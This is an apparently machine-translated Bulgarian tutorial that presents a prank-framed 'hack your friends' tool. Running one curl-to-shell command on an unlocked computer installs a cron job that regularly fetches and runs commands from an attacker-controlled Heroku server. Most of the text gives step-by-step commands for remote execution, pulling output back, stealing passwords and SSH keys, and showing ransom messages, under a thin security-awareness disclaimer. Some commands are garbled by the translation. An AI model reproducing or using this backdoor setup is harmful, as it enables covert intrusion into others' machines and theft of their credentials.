Как да хакнете приятелите си

Приятелите ми често оставят компютрите си отворени и отключени. Казвам им, че вероятно трябва да имат навика да заключват компютрите си, но не ме слушат. Така че създадох прост проект, за да хакна приятелите си и да им покажа значението на компютърната сигурност.

Всичко, което трябва да направя, е да изчакам те да оставят компютъра си отключен за няколко секунди, да отворят терминала си и да напишат една кратка команда.

Това е! Техният компютър е заразен и мога да изпълнявам команди, които искам на този компютър дистанционно. Доста сладка, нали? Или може би шокиращо?

Хакването е незаконно. По-конкретно:

„Умишлено достъп до [ing] компютър без разрешение или надвишаване на [ing] разрешен достъп“ - Законът за компютърните измами и злоупотреба (18 U.S.C. 1030)

Така че имайте предвид, че целта на тази статия е да ви покаже колко лесно би било човек, който има лоши намерения да ви хакне, за да можете сами да избегнете хакване.

Не е нужен някакъв хакерски гений, който да ви разруши живота - всеки „скрипт, който може да получи физически достъп до вашия компютър, може да ви компрометира, като изтеглите скрипт, съдържащ само 50 реда код.

Първи настройки

Целият код за този проект живее в това хранилище, ако искате да влезете веднага, но по-долу ще обясня как работи всичко.

Първо, просто трябва да клонирате репо, да инсталирате неговите зависимости и да свържете инструмента за интерфейс на командния ред на хак (CLI).

git clone https://github.com/ccorcos/hack.git
git дистанционно премахване произход
CD хак
npm инсталиране
npm връзка

След това трябва да настроите Heroku да хоства скриптове, които ще се изпълняват на вашата машина с приятели. Ако никога досега не сте използвали Heroku, регистрирайте се тук (безплатно е!) И настройте техния CLI инструмент на вашата машина.

варя инсталирайте heroku-toolbelt
heroku вход

Сега вътре в hack repo, създайте приложение Heroku с лесно име, което да запомните. Използвам хакер-чет.

heroku създават хакер-чет

След това трябва да изпълните команда, за да направите малка настройка. Всичко, което наистина прави, е да получите основния URL адрес за вашия уебсайт Heroku и да го поставите в своя package.json. По този начин сървърът може да инжектира URL адреса на приложението в скриптите на черупките.

npm run init

Можете да стартирате сървъра локално, ако искате да се хакнете и да тествате нещата.

npm старт

Или можете да внедрите в Heroku.

npm стартирате внедряване

Сега сте готови да хакнете!

Hack API

Красотата на тази програма е, че за да започнете да хакнете някого, просто трябва да изпълните една команда на тяхната машина.

curl  / хак | од

ROOT_URL е специфичният път към вашето приложение. Когато стартирате сървъра локално, това ще бъде localhost: 5000 и когато го внедрите в Heroku, това ще бъде нещо като .herokuapp.com.

Това прави настройката на cron - „хронологична работа“, която възобновява задачите в определени моменти - да пингира / env / live крайната точка всяка минута и изпраща резултата на sh. Всъщност е съвсем просто! И Heroku ви предоставя HTTPS безплатно, така че "сигурно" нали?

След като хакнете своя приятел, можете да направите всичко останало с инструмента на командния ред от вашия компютър.

Инструментът за хакване има концепция за различни хакерски среди. Когато хакнете някой, използващ / хак крайната точка, този човек започва в средата на живо. И за всяка среда можете да изпълнявате различни различни команди. Ще демонстрирам всичко с малко стъпка.

Следното ще пренапише скрипта на обвивката на средата на живо, за да изпълни следната команда, която ще каже на глас „наблюдавам те“.

хак на живо exec "кажи" аз те гледам ""

Е, това все още няма да работи, все още трябва да преразгърнете към приложението си Heroku.

хак разгръщане

Сега изчакайте следващата минута и гледайте как компютърът на приятеля ви пингува сървъра ви, като подрежда регистрационните файлове на сървъра.

хак логове

Целият смисъл на околната среда е, за да можете да хакнете няколко души едновременно. За да изолирате хората в различни среди, просто трябва да промените името.

хак на живо преименувайте jon

Следващия път, когато средата на живо е pinging, тя ще пренапише заданието cron, за да започне да пингва вместо jon средата.

Можете да направите всичко същото само като промените аргумента на средата.

hack jon exec "кажи" здравей джон ""

Сега, ако сте имали достатъчно забавление за деня и купонът приключи, можете да забравите Джон и да го уверите, че сте го „откачили”.

хак Джон забрави

Това ще изтрие заданието на cron от компютъра им. Или може да искате просто да поставите тази среда в режим на спални клетки, за да можете да я възстановите по-късно.

hack jon interval 1d

Сега, вместо да пингвате вашия сървър всяка минута (по подразбиране), той ще пинт всеки ден в полунощ. И когато искате да го събудите отново, можете да промените интервала обратно на всяка минута и на следващия ден, добре е да продължите!

hack jon interval 1m

Някои други забавни неща, които трябва да направите, са създаването на допълнителни задания за cron. Ето как можете да събуждате приятеля си в 6 часа сутринта, за да му напомняте за компютърната сигурност.

hack jon cron "0 6 * * * кажи" добро утро, помниш ли какво ти казах за заключването на компютъра ти? "

Послепис Ако не си спомняте как работят Cron задачите, това е чудесен ресурс. Почти всичко се свежда до тази малка диаграма.

* * * * *
| | | | |
| | | | |
| | | | + ---- Ден от седмицата (диапазон: 1-7, 1 стои за понеделник)
| | | + ------ Месец на годината (диапазон: 1-12)
| | + -------- Ден на месеца (диапазон: 1-31)
| + ---------- Час (обхват: 0-23)
+ ------------ минута (обхват: 0-59)

Едно от любимите ми е предварително зададения работен плот, който ще изтегли изображение от даден URL адрес и ще го зададе като фонова снимка.

hack jon предварително зададен работен плот http://i.imgur.com/5FC2r9R.jpg

И ако сте написали много задания за cron и не знаете какво има там, можете да използвате командата dump.

hack jon dump "crontab -l"

Сега отворете логовете си и ще видите изхода на следващия пинг. Това всъщност е много по-зловещо сега, когато можете да получите информация обратно. Ако искате да бъдете по-зловещи, можете да търсите дешифрирани пароли или да откраднете техните ssh ключове.

hack jon предварително зададени пароли
hack jon preset ssh

Но ако просто искате да му дадете добро старомодно плашене, изпратете му съобщение за откуп!

hack jon предварително зададен откуп "Здравей, Джон, казах ти да не оставяш компютъра си отключен."

И накрая, ако установите, че добавяте куп задачи за cron и просто искате да започнете отначало, нулирането е тук, за да ви помогне.

хак Джон нулиране

Сега се забавлявайте с това нещо и ме уведомете какви са вашите любими шеги, като изпратите заявка за изтегляне с нова команда или предварително зададена настройка!

Честито хакерство!